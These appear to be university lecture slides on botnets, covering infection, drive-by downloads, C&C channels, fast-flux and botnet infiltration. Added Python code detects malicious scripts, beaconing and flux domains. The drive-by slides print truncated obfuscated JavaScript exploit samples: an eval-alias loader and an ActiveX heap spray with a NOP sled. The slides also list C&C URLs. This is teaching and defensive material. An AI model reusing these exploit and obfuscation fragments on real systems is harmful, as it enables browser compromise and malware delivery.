
Malicious Software and its Underground Economy

Two Sides to Every Story

Botnets
Lorenzo Cavallaro
Information Security Group Royal Holloway, University of London

Jun 17, 2013 (Week 1-4)

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

1 / 23

Botnets I

Bot
  Autonomous programs performing tasks
  More recent trend in malicious development

Benign bots
  First bots were programs used for Internet Relay Chat (IRC)
  React to events in IRC channels
  Typically offer useful services

Early definition of bot
  An IRC user who is actually a program. On IRC, typically the robot provides some useful service. Examples are NickServ, which tries to prevent random users from adopting nicks already claimed by others.


Botnets II

Eggdrop bot (1993)
  Used to manage IRC chat channels when the operator was away
  Still maintained, see http://eggheads.org

Malicious IRC bots started to evolve
  Takeover wars to control certain IRC channels
  Trash talking (flooding)
  Also involved in Denial of Service (DoS) to force IRC net splits
  IRC proxies to hide the attacker's origin

A number of parallel, malicious developments


History I

How did we get here?
  Early 1990s: IRC bots
    Automated management of IRC channels
  1999-2000: Distributed DoS tools (distribution)
    Trinoo, TFN2k, Stacheldraht
  1998-2000: Trojan Horses (remote control)
    BackOrifice, BackOrifice2k, SubSeven
  2001-today: Worms (spreading)
    Code Red, Blaster, Sasser


History II

Bots today
  Malware (backdoor, Trojan) running on compromised machines
  Incorporates different modules to carry out malicious tasks (spamming, DoS, ...)
  Remote controlled by a criminal entity (called bot master or bot herder)

Bots are incorporated into networks of compromised machines
  Botnets (sizes up to hundreds of thousands of infected machines)

Botnets
  Main vehicle for carrying out criminal activities
  Financial motivation


Botnets

How do botnets get created?
  Infection and spreading
How are bots (and botnets) controlled?
  Command and control channel (C&C), robustness features (e.g., fast flux, domain flux, push/pull/P2P)
What are botnets used for?
  Criminal applications
How can we mitigate the problem?


Creation

Host infected by one of
  Network worm (vulnerabilities)
  Email attachment
  Trojan version of a program (ever heard of P2P?)
  Drive-by downloads (malicious web sites)
  Existing backdoor (from a previous infection)
  Specialized services (PPI, Exploit-as-a-Service): see Week 5


Drive-By Downloads I

Malicious scripts
  Injected into legitimate sites (e.g., via SQL injection)
  Hosted on malicious sites (URLs distributed via spam)
  Embedded into ads

Drive-by downloads
  Attacks against the web browser and/or vulnerable plug-ins
  Typically launched via client-side scripts (JavaScript, VBScript)

Redirection
  Landing page redirects to the malicious site (e.g., via iframe)
  Makes management easier
  Customize exploits (browser version), serve each IP only once


Drive-By Downloads II

Malicious JavaScript code
  Typically obfuscated and hardened (to make analysis more difficult)

  function X88MxUL0B(U1TaW1TwV, IyxC82Rbo) {
      var c5kJu150o = 4294967296;
      // the function captures its own source text and the page URL
      // (anti-analysis: editing the code or relocating it changes both)
      var s3KRUV5X6 = arguments.callee;
      s3KRUV5X6 = s3KRUV5X6.toString();
      s3KRUV5X6 = s3KRUV5X6 + location.href;
      var s4wL1Rf57 = eval;   // eval hidden behind an alias
      ...
      // LR8yTdO7t holds the decoded code
      try { s4wL1Rf57(LR8yTdO7t); }
      ...
  }
  X88MxUL0B(ACada193b99c...76d9A7d6D676279665F5f81);


Drive-By Downloads III

  function Exhne69P() {
      // long run of %u9090 (NOP) escapes followed by the payload
      var YuL42y0W = unescape("%u9090%u9090... ...%u3030%u3030%u3030%u3030%u3038%u0000");
      ...
      var pvOWGrVU = unescape("%u0c0c%u0c0c");
      pvOWGrVU = BAlrZJkW(pvOWGrVU, Hhvo4b_X);
      // the same block is copied into many array slots (heap spray)
      for (var cYQZIEiP = 0; cYQZIEiP < cFyP_X9B; cYQZIEiP++) {
          RBGvC9bA[cYQZIEiP] = pvOWGrVU + YuL42y0W;
      }
      ...
  }
  function a9_bwCED() {
      try {
          // instantiates a vulnerable ActiveX control, then triggers it
          var OBGUiGAa = new ActiveXObject(Sb.SuperBuddy);
          if (OBGUiGAa) {
              Exhne69P();
              dU578_go(9);
              OBGUiGAa.LinkSBIcons(0x0c0c0c0c);
          }
      } catch(e) { }
      return 0;
  }

Check out Wepawet: http://wepawet.iseclab.org
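The two samples above share a handful of static tell-tales that a triage script can score before any dynamic analysis. The following is an added example, not code from the lecture slides: it flags an eval alias, an arguments.callee self-check, unescape'd %u sequences, long NOP/spray runs, ActiveXObject instantiation and machine-generated identifiers; the rule weights, the threshold and both sample scripts are constructed assumptions.

```python
"""Static triage of JavaScript for drive-by-download indicators (added example)."""
import re

# (name, pattern, weight): weights are triage assumptions, not a standard.
RULES = [
    ("eval_call", re.compile(r"\beval\s*\("), 2),
    ("eval_alias", re.compile(r"=\s*eval\s*;"), 3),              # var f = eval;
    ("callee_self_inspect", re.compile(r"arguments\.callee"), 3),
    ("unescape_unicode", re.compile(r"unescape\(\s*[\"'](?:%u[0-9a-fA-F]{4}){4,}"), 3),
    ("nop_sled", re.compile(r"(?:%u9090){8,}"), 4),
    ("spray_address", re.compile(r"%u0c0c%u0c0c|0x0c0c0c0c"), 4),
    ("activex", re.compile(r"new\s+ActiveXObject\s*\("), 2),
]
IDENT = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")

def random_identifiers(script):
    """Identifiers of >= 7 chars mixing digits, lower and upper case (obfuscator output)."""
    found = set()
    for ident in IDENT.findall(script):
        if (len(ident) >= 7 and re.search(r"\d", ident)
                and ident.lower() != ident and ident.upper() != ident):
            found.add(ident)
    return found

def triage(script, suspicious_at=6):
    """Score one script; a rule contributes its weight once, however often it fires."""
    hits = {name: len(rx.findall(script)) for name, rx, _w in RULES}
    score = sum(w for name, _rx, w in RULES if hits[name])
    idents = random_identifiers(script)
    if len(idents) >= 3:          # assumption: three or more is beyond coincidence
        score += 2
    return {
        "score": score,
        "hits": {k: v for k, v in hits.items() if v},
        "random_identifiers": sorted(idents),
        "verdict": "suspicious" if score >= suspicious_at else "benign",
    }

# Constructed samples: one mimicking the slides' obfuscated loader, one benign.
SAMPLE_OBFUSCATED = """function Q7kLm2Zp(aB3xY9qR) {
  var s1Tk8Wq = arguments.callee.toString() + location.href;
  var e4Rt9Yu = eval;
  var p2Xc6Vb = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
  var a7Kd3Hn = unescape("%u0c0c%u0c0c");
  try { e4Rt9Yu(aB3xY9qR); } catch (e) {}
}"""
SAMPLE_BENIGN = """function showGreeting(name) {
  var el = document.getElementById("greeting");
  el.textContent = "Hello, " + name;
}"""

if __name__ == "__main__":
    for label, src in (("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)):
        print(label, triage(src))
```

Static rules like these are cheap but evadable (split strings, different NOP bytes), which is why tools such as Wepawet execute the script in an instrumented browser and inspect what the eval alias actually receives.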


Propagation Technique

Remote exploit + drive-by-download
  (figure: annotated screenshot of the compromised site)
  link to malicious JS injected into the site
  exploit MS06-014 + MS07-004
  keylogger/backdoor download
  3 days prior to the Super Bowl!


Propagation Techniques
Rogue Antivirus



Command & Control

Centralized control
  IRC: commands published in IRC channels (irc.krienaicw.pl #djdjeiu)
  HTTP: commands published in web pages (http://www.myspace.com/angelairiejs/)
Distributed control
  P2P: commands and/or the commander's address published in the P2P network
Push vs. Pull
  Push: the bot silently waits for commands from the commander
  Pull: the bot repeatedly queries the commander to see if there is new work to do

IRC based botnet

(figure: botmaster, one C&C server, and the bots connected to it)

The bots continuously (re)connect to the C&C server
The botmaster sends a command (e.g., "attack a.b.c.d") to the C&C server
The C&C server forwards the command to all connected bots
If the C&C server is isolated, the botmaster loses control of all the bots
It could be very difficult to identify the botmaster! (e.g., coffee shops or a chain of compromised machines)

(figure: botmaster, several C&C servers, and the bots connected to them)

Multiple C&C servers can be used simultaneously
When a C&C server is isolated, the bots connect automatically to the others
The use of multiple C&C servers increases the lifetime of the botnet

HTTP based botnet

Very similar to a botnet based on IRC
C&C in pull mode
  http://91.207.4.122/spm/s_tasks.php?id=468831...
  http://akhadqwd.blogspot.com/
  http://www.myspace.com/sakjfuje/

  ...
  <table>
    <tr>
      <td class="asjkdha">ddos www.bank.com</td>
    </tr>
  </table>
  ...

C&C traffic is difficult to identify
  Difficult to block at network level (e.g., firewall)
  Difficult to block at DNS level (e.g., domain blacklisting)
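Because pull-mode C&C looks like ordinary web browsing and can hide on legitimate hosting, blocking by address or domain is weak; what a pull-mode bot cannot avoid is polling its task URL on a timer. The following is an added example, not code from the lecture slides: it reads proxy log lines and reports (client, URL) series with many hits and near-constant spacing. The log format, the addresses (TEST-NET ranges) and the thresholds are constructed assumptions.

```python
"""Beaconing detection for HTTP pull-mode C&C in proxy logs (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log: "<ISO timestamp> <client IP> <method> <URL>".
# 10.0.0.5 polls one task URL every ~5 minutes; 10.0.0.8 browses normally.
PROXY_LOG = """\
2013-06-17T09:00:02 10.0.0.5 GET http://203.0.113.9/spm/s_tasks.php?id=468831
2013-06-17T09:00:10 10.0.0.8 GET http://www.example.com/
2013-06-17T09:05:01 10.0.0.5 GET http://203.0.113.9/spm/s_tasks.php?id=468831
2013-06-17T09:07:45 10.0.0.8 GET http://www.example.com/news
2013-06-17T09:10:03 10.0.0.5 GET http://203.0.113.9/spm/s_tasks.php?id=468831
2013-06-17T09:15:02 10.0.0.5 GET http://203.0.113.9/spm/s_tasks.php?id=468831
2013-06-17T09:16:30 10.0.0.8 GET http://www.example.com/news
2013-06-17T09:20:00 10.0.0.5 GET http://203.0.113.9/spm/s_tasks.php?id=468831
2013-06-17T09:25:04 10.0.0.5 GET http://203.0.113.9/spm/s_tasks.php?id=468831
2013-06-17T09:58:12 10.0.0.8 GET http://www.example.com/
2013-06-17T10:40:00 10.0.0.8 GET http://www.example.com/news
"""

def parse(log):
    """Group request timestamps by (client, host, path); the query string is
    dropped because a bot id such as ?id=... differs per infected host."""
    series = defaultdict(list)
    for line in log.splitlines():
        ts, client, _method, url = line.split()
        u = urlsplit(url)
        series[(client, u.netloc, u.path)].append(datetime.fromisoformat(ts))
    return series

def beacon_candidates(log, min_hits=5, max_cv=0.1):
    """Return (client, host, path, period_s, cv) for series whose inter-request
    gaps have a coefficient of variation below max_cv (i.e. a timer, not a human)."""
    out = []
    for (client, host, path), times in parse(log).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = mean(gaps)
        cv = pstdev(gaps) / period if period else 0.0
        if cv <= max_cv:
            out.append((client, host, path, round(period), round(cv, 3)))
    return out

if __name__ == "__main__":
    for hit in beacon_candidates(PROXY_LOG):
        print("beacon:", hit)
```

Bots that add random jitter to the poll interval raise the coefficient of variation, so in practice the threshold is tuned per environment and combined with other signals (new destination, no referrer, fixed response size).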

Dynamic rendez-vous points

How does a bot locate the C&C server?
  1. Hardcoded IP address
  2. FastFlux: hardcoded FQDN or dynamically generated FQDNs (1 FQDN maps to 1 or more IP addresses)
  3. DomainFlux: hardcoded URL or dynamically generated URLs
  4. Search keys in the P2P network


Preventing the rendez-vous

Network level ACLs
DNS ACLs
HTTP ACLs
DDoS against the C&C server?


P2P based botnet (Storm)

(figure: bot master, master server, proxy bots and worker bots, all on the Overnet P2P network)

P2P protocol based on Overnet (derived from Kademlia)
Workers search for keys in the P2P network to locate the proxies (keys are dynamic and published by the proxies through the P2P network)
Workers connect to the proxy and wait for commands (each key is associated with the IP and the port of a new proxy)
The worker bot connects to the proxy, authenticates itself and waits for commands
The proxy forwards commands from the master to the workers and vice versa
Master servers are controlled directly by the botmaster and are hosted on bullet-proof hosts
Workers with the best resources are elected as proxies

Fast-flux service network

(figure: the victim queries a non-authoritative name server, which queries the botnet's authoritative name server; agents 1-6 front for the mother-ship)

Offline, disinfected, or problematic agents are replaced with others
The botnet is typically composed of millions of agents
The identity of the core components of the infrastructure is well protected
Multiple domains are used by the same botnet (it is not sufficient to shut down a domain)
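Both the FastFlux rendez-vous option above and this slide rest on one observable: a single FQDN that resolves, lookup after lookup, to many short-lived, widely scattered agent addresses. The following is an added example, not code from the lecture slides: it computes flux features from a sequence of DNS answers and applies a simple decision rule. The answers are constructed (TEST-NET and benchmarking ranges), and the thresholds and the use of /16 prefixes as a stand-in for ASN diversity are assumptions (real tooling looks up the ASN of each address).

```python
"""Fast-flux detection over repeated DNS lookups of one name (added example)."""
import ipaddress

# Constructed answers: (ttl_seconds, A records) from successive lookups of one FQDN.
FLUX_DOMAIN = [
    (300, ["198.51.100.23", "203.0.113.77", "192.0.2.145", "198.18.4.9"]),
    (300, ["203.0.113.77", "192.0.2.200", "198.18.77.1", "198.51.100.90"]),
    (300, ["192.0.2.9", "198.18.4.9", "203.0.113.5", "198.51.100.23"]),
]
# A normally hosted name: the same two addresses, long TTL, every time.
STATIC_DOMAIN = [
    (86400, ["192.0.2.10", "192.0.2.11"]),
    (86400, ["192.0.2.10", "192.0.2.11"]),
    (86400, ["192.0.2.10", "192.0.2.11"]),
]

def flux_features(lookups):
    """Distinct addresses, distinct /16 networks (assumed ASN proxy), lowest TTL,
    and churn: mean fraction of the answer set replaced between consecutive lookups."""
    ips = {ip for _ttl, answers in lookups for ip in answers}
    nets = {ipaddress.ip_network(f"{ip}/16", strict=False) for ip in ips}
    min_ttl = min(ttl for ttl, _answers in lookups)
    churn = 0.0
    if len(lookups) > 1:
        per_step = []
        for (_, a), (_, b) in zip(lookups, lookups[1:]):
            sa, sb = set(a), set(b)
            per_step.append(1 - len(sa & sb) / len(sa | sb))   # Jaccard distance
        churn = sum(per_step) / len(per_step)
    return {"distinct_ips": len(ips), "distinct_nets": len(nets),
            "min_ttl": min_ttl, "churn": round(churn, 2)}

def is_fast_flux(lookups, min_ips=5, min_nets=3, max_ttl=600):
    """Decision rule (thresholds are assumptions): many addresses, spread over
    several networks, advertised with a short TTL so agents can be rotated."""
    f = flux_features(lookups)
    return (f["distinct_ips"] >= min_ips and f["distinct_nets"] >= min_nets
            and f["min_ttl"] <= max_ttl)

if __name__ == "__main__":
    for name, lookups in (("flux", FLUX_DOMAIN), ("static", STATIC_DOMAIN)):
        print(name, flux_features(lookups), "fast-flux" if is_fast_flux(lookups) else "ok")
```

Content delivery networks also return short TTLs and many addresses, so the decision rule is a triage signal to be confirmed with the agents' nature (residential ranges, changing ports, mother-ship behind them), not a verdict on its own.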

Infiltrate a botnet (IRC C&C)

(figure: botmaster, C&C server and bots, with the infiltrator joining as one more bot)

The infiltrator connects to the C&C server as a normal bot and can see all the bots connected
The infiltrator receives commands from the botmaster (e.g., "attack a.b.c.d") as the other bots do
The infiltrator has the ability to send commands to other bots

Infiltrate a botnet (HTTP C&C)

(figure: botmaster, C&C server and bots, with the infiltrator polling the server as one more bot)

The infiltrator connects to the C&C server as a normal bot but cannot see the other bots connected (C&C pull)
The infiltrator receives commands from the botmaster (e.g., "attack a.b.c.d") as the other bots do
The infiltrator cannot send commands to other bots
The server-side infiltrator instead can see the other bots and send them commands

Your Botnet is My Botnet: Analysis of a Botnet Takeover, Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin Szydlowski, Richard Kemmerer, Chris Kruegel, and Giovanni Vigna, in the Proceedings of the 16th ACM Conference on Computer and Communications Security (CCS), 2009
